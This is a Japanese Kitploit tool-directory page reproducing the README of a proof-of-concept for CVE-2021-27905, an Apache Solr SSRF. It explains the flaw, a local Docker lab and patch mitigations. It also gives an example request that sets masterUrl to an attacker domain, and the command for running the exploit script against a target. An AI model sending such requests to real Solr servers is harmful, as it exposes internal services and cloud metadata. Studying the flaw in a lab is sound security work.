Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-27905 — Apache Solr < 8.8.2 サーバーサイドリクエストフォージェリ | Kitploit
ツール/GitHubGitHub/rizzziom/cve-2021-27905
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubrizzziom/cve-2021-27905

CVE-2021-27905

Apache Solr < 8.8.2 サーバーサイドリクエストフォージェリ

リポジトリを見る
28ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2021-27905

番号タイトル
1概要
2根本原因
3概念実証
4緩和策 (8.8.2+)
5参考

教育および研究目的のみに使用してください。所有していない、またはテストする明示的な許可がないシステムでこのコードを使用しないでください。誤用について私は一切責任を負いません。

概要

これはApache Solr(< 8.8.2)に影響するサーバーサイドリクエストフォージェリの脆弱性です。レプリケーションハンドラのmasterUrlパラメータを介して、リモートの攻撃者が内部または外部のシステムに対して任意のHTTPリクエストを送信でき、内部サービスや機密性の高いクラウドメタデータを露出させる可能性があります。

影響を受けるバージョン : 8.8.2 より前のすべてのバージョン(7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

根本原因

Solr のレプリケーションメカニズムは、「レプリカ」が masterUrl または leaderUrl パラメータを指定して「マスター/リーダー」からインデックスファイルを取得できるようにします。影響を受ける Apache Solr バージョンでは、このパラメータで指定されたURLが適切に検証されません。そのため、攻撃者はサーバーに任意のリモートリソースへアクセスさせることができます。

脆弱なフロー

  • 攻撃者は次のようなエンドポイントにリクエストを送信します。
root@kitploit:~
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>

Solr の ReplicationHandler は次のことを行います。

  1. リクエストを受け付ける。
  2. 指定された masterUrl を使用してインデックスデータをダウンロードする。
  3. 内部でそのアドレスに対してHTTP呼び出しを行う。

概念実証

ラボのセットアップ

  • ラボはdockerを使用してローカルにセットアップできます。
root@kitploit:~
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
  • クリーンアップ
root@kitploit:~
$ docker compose down

悪用

  • 仮想環境をセットアップします。
root@kitploit:~
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
  • 要件をインストールします。
root@kitploit:~
$ pip install -r requirements.txt
  • cve-2021-27905.py を実行します。
root@kitploit:~
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>

SSRF PoC

緩和策 (8.8.2+)

Solr の ReplicationHandler は次のようにパッチされました。

  • masterUrl/leaderUrl が承認されたホストのみを指すことを検証する。
  • 許可されるURLスキームを制限する(http、https のみ)。
  • リモートストリーミング機能を強化する。
  • 管理者に /replication を認証で保護するか、未使用の場合は完全に削除することを推奨する。

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2021-27905
  • https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

ツールをダウンロード